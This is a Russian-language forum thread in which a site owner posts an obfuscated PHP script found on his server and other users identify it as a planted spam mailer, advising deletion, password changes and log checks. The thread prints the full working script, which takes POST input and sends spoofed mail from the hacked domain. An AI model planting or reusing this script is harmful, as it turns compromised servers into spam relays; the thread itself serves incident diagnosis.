[ZeRoN]

Доброго времени суток! Вчера на своем сервере обнаружил скрипт php непонятного мне происхождения. сам до конца в нем разобраться не могу, может быть вы подскажите что он делает и какой вред мог нанести серверу?

PHP код:

<?php
error_reporting(0); if (count($_POST) != 2) { die(PHP_OS . "10+" . md5(0987654321)); } $veb65c0b0 = array_keys($_POST); if ($veb65c0b0[0][0] == 'l') { $vd56b6998 = $veb65c0b0[0]; $v8d777f38 = $veb65c0b0[1]; } elseif ($veb65c0b0[0][0] == 'd') { $vd56b6998 = $veb65c0b0[1]; $v8d777f38 = $veb65c0b0[0]; } else { die(PHP_OS . "10+" . md5(0987654321)); } $v01b6e203 = stripslashes($_POST[$vd56b6998]); $v8d777f38 = stripslashes($_POST[$v8d777f38]); preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; if (ne667da76($_SERVER['SERVER_NAME'])) { $v10497e3f = false; } else { if ($vb068931c != '') $vd98a07f8 = "$vb068931c "; $v0c83f57c = $vee11cbb1 . "@".preg_replace('/^www\./i','',$_SERVER['SERVER_NAME']); $vd98a07f8 .= "<$v0c83f57c>"; $v4340fd73 = "From: $vd98a07f8\r\n"; $v10497e3f = true; } if (((strtolower(@ini_get('safe_mode')) == 'on') || (strtolower(@ini_get('safe_mode')) == 'yes') || (strtolower(@ini_get('safe_mode')) == 'true') || (ini_get("safe_mode") == 1 ))) { $v10497e3f = false; } $v4340fd73 .= "MIME-Version: 1.0\r\n"; $v4340fd73 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v4340fd73 .= "Content-Transfer-Encoding: quoted-printable\r\n"; $v6f4b5f42 = na73fa8bd($v6f4b5f42); if ($v10497e3f) { if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73, "-f$v0c83f57c")) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } else { if (mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v4340fd73)) echo "OK" . md5(1234567890); else die(PHP_OS . "20+" . md5(0987654321)); } exit; function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b=0;$v865c0c0b<$vf5a8e923;$v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0==0x3d) || ($v4a8a08f0>=0x80) || ($v4a8a08f0<0x20)) { if ((($v4a8a08f0==0x0A) || ($v4a8a08f0==0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .=chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } ?>

[En@n]

Если Вы знаете, что скрипт не вы добавляли и его нет в исходниках движка сайта или шаблоне, то удаляйте его, а также меняйте все пароли доступа

[Kopc]

меняйте пароли доступа, чистите комп от вирусни и другие телодвижения....

Просмотрел код. С вероятностью 101% это для рассылки спама.

[awmaster08]

Действительно похоже на рассылку спама. К скрипту обращаются через POST запрос. Посмотрите логи, интересно что там. По данным передаваемым через POST можно будет понять кто, что и зачем. Обязательно поменяйте пароли.

[ZeRoN]

Благодарю Вас за разъяснение, пароли поменял, файл удалил.

[AntoXa]

Я б на твоем месте еще бы просмотрел бы все файлы на наличие подобной фигни. Часто такие люди оставляют много "кодиков".

[ZeRoN]

AntoXa, просмотрел, вроде чисто. Этот в корне лежал.

[En@n]

Когда ломают, то прописывают во все файл с названием index обычно, в не зависимости где этой файл записан, в корне или же в 10 уровне вложенности